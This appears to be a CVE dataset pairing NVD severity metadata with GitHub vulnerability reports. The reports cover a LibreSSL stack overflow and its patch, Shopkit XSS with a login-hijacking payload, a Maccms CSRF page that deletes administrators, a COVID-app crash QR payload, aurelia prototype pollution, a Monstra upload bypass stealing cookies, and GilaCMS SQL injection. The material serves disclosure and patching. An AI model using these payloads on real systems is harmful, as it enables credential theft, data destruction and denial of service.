/root/projects/portable/tests/constraints.c:36 #3 0x7f1f072020b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #4 0x5563db24c72d in _start (/root/projects/portable/build/tests/constraints+0xc672d) Address 0x7ffd4be82770 is located in stack of thread T0 at offset 288 in frame #0 0x5563db24db01 in x509_constraints_parse_mailbox /root/projects/portable/crypto/x509/x509_constraints.c:314 This frame has 1 object(s): [32, 288) 'working' (line 316) <== Memory access at offset 288 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x67a6c) Shadow bytes around the buggy address: 0x1000297c8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000297c84a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000297c84b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000297c84c0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 0x1000297c84d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1000297c84e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3 0x1000297c84f0: f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 0x1000297c8500: 00 00 00 00 f1 f1 f1 f1 f1 f1 00 00 00 00 00 00 0x1000297c8510: 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x1000297c8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000297c8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3637286==ABORTING ``` This is because the buffer `working` is full of data thus is not ended with `'\0'`, and the call of `strdup` can crash the program. In the function `x509_constraints_parse_mailbox` of `src/lib/libcrypto/x509/x509_constraints.c`, the variable `wi` means the bytes have been written in buffer `work`,if `wi` is greater than or **equal to** `DOMAIN_PART_MAX_LEN`, the parse should be stopped because the last byte should be `'\0'`. The following patch can fix this problem: ```diff --- a/src/lib/libcrypto/x509/x509_constraints.c +++ b/src/lib/libcrypto/x509/x509_constraints.c @@ -339,7 +339,7 @@ x509_constraints_parse_mailbox(uint8_t *candidate, size_t len, if (c == '.') goto bad; } - if (wi > DOMAIN_PART_MAX_LEN) + if (wi >= DOMAIN_PART_MAX_LEN) goto bad; if (accept) { working[wi++] = c; @@ -348,7 +348,7 @@ x509_constraints_parse_mailbox(uint8_t *candidate, size_t len, } if (candidate_local != NULL) { /* We are looking for the domain part */ - if (wi > DOMAIN_PART_MAX_LEN) + if (wi >= DOMAIN_PART_MAX_LEN) goto bad; working[wi++] = c; if (i == len - 1) { ```
stack-buffer-overflow in function x509_constraints_parse_mailbox
https://api.github.com/repos/libressl/openbsd/issues/126/comments
2
2021-09-23T14:25:43Z
2021-10-04T12:02:09Z
https://github.com/libressl/openbsd/issues/126
1,005,501,503
126
2,612
CVE-2020-20508
2021-09-24T22:15:08.253
Shopkit v2.7 contains a reflective cross-site scripting (XSS) vulnerability in the /account/register component, which allows attackers to hijack user credentials via a crafted payload in the E-Mail text field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/samnabi/shopkit/issues/223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/samnabi/shopkit/issues/223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopkit_project:shopkit:2.7:*:*:*:*:*:*:*", "matchCriteriaId": "1788FC19-1F1A-40F0-A837-46AD42FA41B2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/samnabi/shopkit/issues/223
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "samnabi", "shopkit" ]
In the latest version v2.7 First,I found a reflective XSS vulnerability in register. The payload is: ``` "><img/src=x+onerror=alert("XSS_vulnerability")><xss=" https://shopkit.samnabi.com/account/register?email="><img/src=x+onerror=alert("XSS_vulnerability")><xss=" ``` ![XSS](https://user-images.githubusercontent.com/24983597/65400455-dd88ce80-ddf4-11e9-9e67-b435ca90a94d.png) Then,I fount this XSS vulnerability could cause **login hijacking** The payload is: ``` "><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d" https://shopkit.samnabi.com/account/register?email="><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d" ``` When the user enters a username via this link,as shown below ![图片](https://user-images.githubusercontent.com/24983597/65401766-cd74ed00-ddfc-11e9-990b-4d1114c2af5c.png) Then click on the "log in" The username and password will be submitted to my link. ![图片](https://user-images.githubusercontent.com/24983597/65402025-622c1a80-ddfe-11e9-90e9-3c6d8e219d6b.png)
Login hijacking in register
https://api.github.com/repos/samnabi/shopkit/issues/223/comments
0
2019-09-23T04:34:50Z
2021-02-23T14:34:39Z
https://github.com/samnabi/shopkit/issues/223
496,889,943
223
2,613
CVE-2020-20514
2021-09-24T22:15:08.307
A Cross-Site Request Forgery (CSRF) in Maccms v10 via admin.php/admin/admin/del/ids/<id>.html allows authenticated attackers to delete all users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.9, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/76" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/76" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "E1258FF8-1AB2-4A53-88A6-58685BDFEA73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/magicblack/maccms10/issues/76
[ "Exploit", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
After the administrator logged in, open the following page. POC: ``` <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <link rel="stylesheet" href="http://127.0.0.1/maccms10/admin.php/admin/admin/del/ids/1.html"> <link rel="stylesheet" href="http://127.0.0.1/maccms10/admin.php/admin/admin/del/ids/2.html"> <link rel="stylesheet" href="http://127.0.0.1/maccms10/admin.php/admin/admin/del/ids/3.html"> </body> </html> ``` Then administrator users numbered 1, 2, 3 will be deleted. If the administrators are all deleted, no one can log in.
There is a CSRF vulnerability that can del the administrator account
https://api.github.com/repos/magicblack/maccms10/issues/76/comments
1
2019-10-22T12:07:51Z
2019-10-23T06:10:21Z
https://github.com/magicblack/maccms10/issues/76
510,611,720
76
2,614
CVE-2021-41329
2021-09-27T06:15:08.057
Datalust Seq before 2021.2.6259 allows users (with view filters applied to their accounts) to see query results not constrained by their view filter. This information exposure, caused by an internal cache key collision, occurs when the user's view filter includes an array or IN clause, and when another user has recently executed an identical query differing only by the array elements.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://blog.datalust.co" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/datalust/seq-tickets/issues/1322" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://blog.datalust.co" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/datalust/seq-tickets/issues/1322" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:datalust:seq:*:*:*:*:*:*:*:*", "matchCriteriaId": "646C75F9-1BA1-4BF1-8CA9-DD3A505BC6FA", "versionEndExcluding": "2021.2.6259", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "682" ]
682
https://github.com/datalust/seq-tickets/issues/1322
[ "Exploit", "Third Party Advisory" ]
github.com
[ "datalust", "seq-tickets" ]
Seq uses time-slice caching to speed up `group by time()` queries and a few others, in particular, those that drive [Dashboards](https://docs.datalust.co/docs/dashboards). Behind the scenes, cache entries are keyed based on the clauses of the query, active signals, and so-on. A bug in recent Seq versions up to 2021.2 causes the keys generated for `in` clauses to collide, when all elements of the detected set are constants. For example: * `select count(*) from stream where @Level in ['warn'] group by time(1m)` and * `select count(*) from stream where @Level in ['error', 'critical'] group by time(1m)` will generate the same cache key, and thus produce incorrect results when two cacheable queries differ only in this respect. The bug is caused by inlining of arrays of constants: instead of `['warn']` generating an expression that constructs an array with a constant element, the array is precomputed and inlined as a constant itself. The code that subsequently generates query cache keys does not properly account for this case. Query cache entries will not collide if: * The queries do not group by `time` and are not executed from a dashboard, * The queries run over different signals, * Any other aspect of the query, including the `select`, `where`, `group by`, `having`, and `order by` clauses, differ in any way.
CVE-2021-41329: Query cache collisions when queries differ only by `in` clause contents
https://api.github.com/repos/datalust/seq-tickets/issues/1322/comments
3
2021-09-15T23:38:50Z
2021-09-20T04:13:46Z
https://github.com/datalust/seq-tickets/issues/1322
997,607,235
1,322
2,615
CVE-2021-37786
2021-09-27T14:15:08.583
Certain Federal Office of Information Technology Systems and Telecommunication FOITT products are affected by improper handling of exceptional conditions. This affects COVID Certificate App IOS 2.2.0 and below affected, patch in progress and COVID Certificate Check App IOS 2.2.0 and below affected, patch in progress. A denial of service (physically proximate) could be caused by scanning a crafted QR code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 4.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/admin-ch/CovidCertificate-App-iOS/issues/146" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/admin-ch/CovidCertificate-App-iOS/issues/146" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bag:covid_certificate:*:*:*:*:*:iphone_os:*:*", "matchCriteriaId": "6BE6A000-79F1-4751-AD7C-90B59914BB55", "versionEndExcluding": null, "versionEndIncluding": "2.2.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/admin-ch/CovidCertificate-App-iOS/issues/146
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "admin-ch", "CovidCertificate-App-iOS" ]
Hello, Small issue, a person could generate a QR code readable by the application (with an invalid signature), with the parameter "dn" containing the value 99999999999999999999999999999999999, the application will crashes each time the QR code is scanned, the problem is also present on Covid Cert but less problematic, indeed a possible scenario (with a bit of social engineering) is that a person creates a QR code with the payload that crashes the application and presents it to a third party (a restaurant for example), The third party can't check the validity of the certificate because the application will crashes at each scan, the third party **could let** the access to these services thinking that the certificate is valid and that it's a bug of the application. (Scenario maybe extreme but with a lot of chances that it works). **_Only tested on IOS_** Payload : `{ "ver": "1.0.0", "nam": { "fn": "foo", "fnt": "FOO", "gn": "bar", "gnt": "BAR" }, "dob": "2000-03-01", "v": [ { "tg": "840539006", "vp": "1119305005", "mp": "EU/1/20/1528", "ma": "ORG-100030215", "dn": 99999999999999999999999999999999999, "sd": 2, "dt": "2021302-18", "co": "AT", "is": "BMSGPK Austria", "ci": "urn:uvci:01:AT:10807843F94AEE0EE5093FBC254BD813P" } ] }` QRcode Payload : `HC1:NCFOXN%TSMAHN-HNL458GI3VR%8S3I0IIC+V 43G-VC9BWH2.W7%$CML9J77D*QQHIZC4TPIFRMLNKNM8JI0EUG*%NH$RSC9$HFE1E0QV1FD/Y4J1ER6W9NT9KP-FHTNP/78LSIT7AZI9$JAYHIXGGX2M KM1GGMJCQ SA KZ*U0I1-I0*OC6H0/VMNPM Q5TM8*N9-I06H00YQK*R3T3+7A.N88J4R$F/MAITH-+R2YBV44PZBBAKO1P9-8:0L.A5R8HM*G64TQCV5RQLCUU5WY31-LH/CJ6IAACG423%B04LT HBSZ46/45/G3ZCIATULV:SNS8F-67N%21Q21$4ZW4Z*AKWIX:S:+IZW4PHBO33BC786B*E3-433QBV53XEBW77WNN+FNULJ96B4UN*97$IJV7776B3D3CZK7%2RZ4QWCS46147TMHS6ML*H:/E6 N$YPQ98ZF0HYGKZNZXVB NEHFXHV$0T2VMF%UVRC-/623WU-F*NF$:II947HAT6UPDMUIP6 4JXD-5W7GGLZQ-TEB403SRF2` ![qrcode](https://user-images.githubusercontent.com/20864985/125963078-1f3fe9a2-cd7b-4055-89f7-b51349740c55.png) Hoping to have helped ^^
Covid Check QRcode Crash App (dos)
https://api.github.com/repos/admin-ch/CovidCertificate-App-iOS/issues/146/comments
3
2021-07-16T14:31:40Z
2021-08-26T20:31:12Z
https://github.com/admin-ch/CovidCertificate-App-iOS/issues/146
946,348,208
146
2,616
CVE-2021-41097
2021-09-27T18:15:08.443
aurelia-path is part of the Aurelia platform and contains utilities for path manipulation. There is a prototype pollution vulnerability in aurelia-path before version 1.1.7. The vulnerability exposes Aurelia application that uses `aurelia-path` package to parse a string. The majority of this will be Aurelia applications that employ the `aurelia-router` package. An example is this could allow an attacker to change the prototype of base object class `Object` by tricking an application to parse the following URL: `https://aurelia.io/blog/?__proto__[asdf]=asdf`. The problem is patched in version `1.1.7`.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/commit/7c4e235433a4a2df9acc313fbe891758084fdec1" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/issues/44" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/releases/tag/1.1.7" }, { "source": "security-advisories@github.com", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/security/advisories/GHSA-3c9c-2p65-qvwv" }, { "source": "security-advisories@github.com", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/aurelia-path" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/commit/7c4e235433a4a2df9acc313fbe891758084fdec1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/releases/tag/1.1.7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/aurelia/path/security/advisories/GHSA-3c9c-2p65-qvwv" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/aurelia-path" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bluespire:aurelia-path:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "06873896-419F-46F3-92F0-B792058E40D7", "versionEndExcluding": "1.1.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/aurelia/path/issues/44
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aurelia", "path" ]
**I'm submitting a bug report** parseQueryString of aurelia path is vulnerable to prototype pollution. **POC** aurelia blog is using parseQueryString to parse location.search, so it is vulnerable to prototype pollution 1. Open the following URL: https://aurelia.io/blog/?__proto__[asdf]=asdf 2. Open Devtools Console, and check the Object.prototype 3. You can notice Object being polluted with the "asdf" property.
Prototype Pollution
https://api.github.com/repos/aurelia/path/issues/44/comments
13
2021-05-14T09:04:12Z
2022-06-02T11:39:44Z
https://github.com/aurelia/path/issues/44
891,751,853
44
2,617
CVE-2020-20691
2021-09-27T22:15:07.477
An issue in Monstra CMS v3.0.4 allows attackers to execute arbitrary web scripts or HTML via bypassing the file extension filter and uploading crafted HTML files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/461" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/461" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "A2226D9F-8476-4F0F-9DE3-21A8FE290533", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/monstra-cms/monstra/issues/461
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
**Brief of this vulnerability** There are many suffix names such as PHP and HTML in uploading files, but the following methods can bypass file restrictions, upload malicious HTML types and execute arbitrary JS code **Test Environment** php7.0.7+apache **Affect version** <=3.0.4 **Payload** 1 Visit website http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager with login 2 Save html codes with '.png' extensions. and upload it like below. ``` <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>hacker</title> </head> <body> <svg/onload=alert(document.cookie)> </body> </html> ``` 3 Click the uploaded file name and Grab the packet and change the suffix name to `XXX"".html` at filename,This circumvents this limitation. 4 move to http://[address]:[port]/[app_path]/public/uploads/[uploaded file] You can see that you executed HTML and JS code,If you access this file, you can get the administrator's cookie and execute any JS code **the details of these vulnerabilities to see** http://test.lingdong.store/2019/10/12/Bypass-the-HTML-file-suffix-restriction-when-uploading-files/
bypassed extension filter in uploading process different before
https://api.github.com/repos/monstra-cms/monstra/issues/461/comments
0
2019-10-11T08:24:25Z
2019-10-12T13:10:29Z
https://github.com/monstra-cms/monstra/issues/461
505,710,156
461
2,618
CVE-2020-20692
2021-09-27T22:15:07.520
GilaCMS v1.11.4 was discovered to contain a SQL injection vulnerability via the $_GET parameter in /src/core/controllers/cm.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://test.lingdong.store/2019/10/13/SQL-injection-in-Gila-CMS-version-1-11-4/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://test.lingdong.store/2019/10/13/SQL-injection-in-Gila-CMS-version-1-11-4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/50" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gilacms:gila_cms:1.11.4:*:*:*:*:*:*:*", "matchCriteriaId": "404DFD9F-C26A-47BB-8D9F-E3D06BA5DEA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/GilaCMS/gila/issues/50
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "GilaCMS", "gila" ]
I installed the latest version of GilaCMS (v1.11.4). After the administrator log in to the website, the search for the sql injection vulnerability exists in the content->pages->posts page. ** Vulnerability related code** The vulnerability related code is in lines 101 to 127 of /src/core/controllers/cm.php, the parameter $_GET is not filtered, and the line is directly brought into the getRows function to perform data query in line 122, resulting in sql injection. ``` function list_rowsAction () { header('Content-Type: application/json'); $table = router::get("t",1); $result = self::list_rows($table, $_GET, $_GET); echo json_encode($result, JSON_PRETTY_PRINT); } function list_rows ($table, $filters, $args) { if(isset($args['groupby'])&&$args['groupby']!=null) { $this->group_rowsAction(); return; } $pnk = new gTable($table, $this->permissions); if(!$pnk->can('read')) return; $result = []; $fieldlist = isset($args['id']) ? 'edit' : 'list'; $result['fields'] = $pnk->fields($fieldlist); $result['rows'] = []; $res = $pnk->getRows($filters, array_merge($args, ['select'=>$result['fields']])); foreach($res as $r) 